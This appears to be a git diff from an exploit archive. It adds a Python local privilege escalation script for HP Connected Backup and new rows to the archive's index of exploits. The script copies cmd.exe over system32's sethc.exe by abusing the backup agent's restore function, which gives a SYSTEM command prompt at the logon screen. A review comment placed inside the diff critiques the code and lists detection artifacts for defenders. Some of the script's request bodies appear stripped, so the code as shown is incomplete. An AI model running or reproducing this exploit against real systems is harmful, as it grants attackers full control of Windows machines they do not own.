+ headers = {"Content-Type": "text/xml; charset=utf-8", 'SOAPAction': '""', "Set-Cookie": "CCSessionID=SessionID11"}
+ response = requests.post(url, data=body, headers=headers)
+ if response.status_code != requests.codes.ok:
+ print "Non-200 response. Exiting..."
+ sys.exit()
+ else:
+ return response.text
+
+
+def get_tdate(response):
+ soup = BeautifulSoup(response, "html.parser")
+ tdate = soup.findAll("m-tdate")[0].string
+ return tdate
+
+#Copy cmd.exe to world-writeable folder
+print "HP Connected Backup Privilege Escalation by Peter Lapp(lappsec)"
+print "Copying cmd.exe to C:\\hpcb-privesc"
+os.system("mkdir C:\\hpcb-privesc")
+os.system("copy C:\\Windows\\system32\\cmd.exe C:\\hpcb-privesc\\sethc.exe")
+
+print "Creating backup for C:\\hpcb-privesc\\sethc.exe"
+
+#StartScan required before IncludeFile request will be accepted
+send_request("""""")
+
+time.sleep(3)
+
+#Add file to backup
+send_request("""QzpcaHBjYi1wcml2ZXNjXHNldGhjLmV4ZQ==true""")
+
+
+print "Initiating Backup"
+#Start backup
+
+send_request("""""")
+
+print """Sleeping for 300 seconds to give time for backup to complete.
+If the script fails after this then change the sleep period to give the backup enough time to complete"""
+
+time.sleep(300)
+
+print "Initiating restore"
+#PrepareRetrieve requires valid PID of process running as SYSTEM. PID 456 is common for Windows 7 but if it fails, try another
+
+send_request("""456""")
+
+#We have to get the m-TDate value for the file in order for the restore to work correctly
+print "Getting m-TDate value"
+fileinfo = send_request("""QzpcaHBjYi1wcml2ZXNjXA==""")
+tdate = get_tdate(fileinfo)
+
+print "Adding Restore file"
+
+send_request("""QzpcaHBjYi1wcml2ZXNjXHNldGhjLmV4ZQ==false"""+tdate+"""""")
+
+
+print "Setting alternate restore path to C:\\Windows\\system32\\"
+
+send_request("""C:\Windows\system32false""")
+
+
+#Set restore to replace existing file
+send_request("""true""")
+
+print "Restoring C:\\hpcb-privesc\\sethc.exe to C:\\Windows\\system32\\sethc.exe"
+send_request("""""")
+
+print "If it made it this far without an error, then you should now be able to log out, press SHIFT 5 times and be given a command prompt as SYSTEM. Enjoy!"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index fff8607c5..d1e0cdb28 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
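Review bot: The failure path in `send_request` calls `sys.exit()` with no status, so a non-200 reply ends the script with exit code 0 and reads as success to anything wrapping it; `sys.exit(1)` is the conventional form, and the message belongs on stderr. The header records the tested version (8.8.2.0) but not the two third-party packages the imports require (`requests` and `bs4`/beautifulsoup4), and it disagrees with the `8.6/8.8.6` range in the index entry added to files_exploits.csv in this same commit, so one of the two is presumably wrong. The `send_request("""...""")` bodies appear empty or reduced to bare values in this rendering, which looks like the XML request bodies were stripped as markup when the page was captured rather than being absent in the original file; worth confirming against the raw file. From the defender's side, the host artifacts this script produces — a new `C:\hpcb-privesc` directory holding a copy of cmd.exe named sethc.exe, a backup-then-restore cycle driven through the local agent on port 16386 with a fixed `CCSessionID` cookie, and a replaced `C:\Windows\system32\sethc.exe` — are exactly what a file-integrity or EDR rule for accessibility-binary tampering should watch.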
@@ -5258,6 +5258,8 @@ id,file,description,date,author,type,platform,port 43776,exploits/hardware/dos/43776.py,"Smiths Medical Medfusion 4000 - 'DHCP' Denial of Service",2018-01-18,"Scott Gayou",dos,hardware, 43780,exploits/macos/dos/43780.c,"macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in 'AppleIntelCapriController::getDisplayPipeCapability'",2018-01-19,"Google Security Research",dos,macos, 43826,exploits/windows/dos/43826.txt,"Peercast < 0.1211 - Format String",2015-05-28,"GulfTech Security",dos,windows, +43854,exploits/windows/dos/43854.py,"MixPad 5.00 - Buffer Overflow",2018-01-23,bzyo,dos,windows, +43856,exploits/hardware/dos/43856.py,"RAVPower 2.000.056 - Memory Disclosure",2018-01-23,"Daniele Linguaglossa",dos,hardware, 40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",dos,osx, 40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,dos,windows, 40593,exploits/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,dos,windows, 
@@ -9169,6 +9171,7 @@ id,file,description,date,author,type,platform,port 43799,exploits/windows/local/43799.txt,"Trillian Pro < 2.01 - Design Error",2004-03-01,"GulfTech Security",local,windows, 43816,exploits/windows/local/43816.txt,"dbPowerAmp < 2.0/10.0 - Buffer Overflow",2014-09-27,"GulfTech Security",local,windows, 43817,exploits/windows/local/43817.txt,"PsychoStats < 2.2.4 Beta - Cross Site Scripting",2014-12-22,"GulfTech Security",local,windows, +43857,exploits/windows/local/43857.py,"HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation",2018-01-23,"Peter Lapp",local,windows, 40538,exploits/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",local,windows, 40540,exploits/windows/local/40540.txt,"NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows, 40541,exploits/windows/local/40541.txt,"NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows, 
@@ -37245,6 +37248,18 @@ id,file,description,date,author,type,platform,port 43850,exploits/php/webapps/43850.txt,"CentOS Web Panel 0.9.8.12 - Multiple Vulnerabilities",2018-01-21,Vulnerability-Lab,webapps,php, 43852,exploits/php/webapps/43852.php,"PHPFreeChat 1.7 - Denial of Service",2018-01-21,"A. Pakbaz",webapps,php, 43853,exploits/perl/webapps/43853.txt,"OTRS 5.0.x/6.0.x - Remote Command Execution",2018-01-21,Bæln0rn,webapps,perl, +43855,exploits/php/webapps/43855.txt,"CentOS Web Panel 0.9.8.12 - 'row_id' / 'domain' SQL Injection",2018-01-23,Vulnerability-Lab,webapps,php, +43858,exploits/multiple/webapps/43858.txt,"NEC Univerge SV9100/SV8100 WebPro 10.0 - Configuration Download",2018-01-23,LiquidWorm,webapps,multiple, +43860,exploits/php/webapps/43860.txt,"LiveCRM SaaS Cloud 1.0 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php, +43861,exploits/php/webapps/43861.txt,"Affiligator 2.1.0 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php, +43862,exploits/php/webapps/43862.html,"RSVP Invitation Online 1.0 - Cross-Site Request Forgery (Update Admin)",2018-01-23,"Ihsan Sencan",webapps,php, +43863,exploits/php/webapps/43863.txt,"Easy Car Script 2014 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php, +43864,exploits/php/webapps/43864.txt,"Wchat 1.5 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php, +43865,exploits/php/webapps/43865.txt,"Zechat 1.5 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php, +43866,exploits/php/webapps/43866.txt,"Tumder 2.1 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php, +43867,exploits/php/webapps/43867.html,"Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)",2018-01-23,"Ihsan Sencan",webapps,php, +43868,exploits/php/webapps/43868.txt,"Quickad 4.0 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php, +43869,exploits/php/webapps/43869.txt,"Flexible Poll 1.2 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php, 40542,exploits/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication 
Bypass",2016-10-14,lahilote,webapps,php, 40543,exploits/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php, 40544,exploits/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,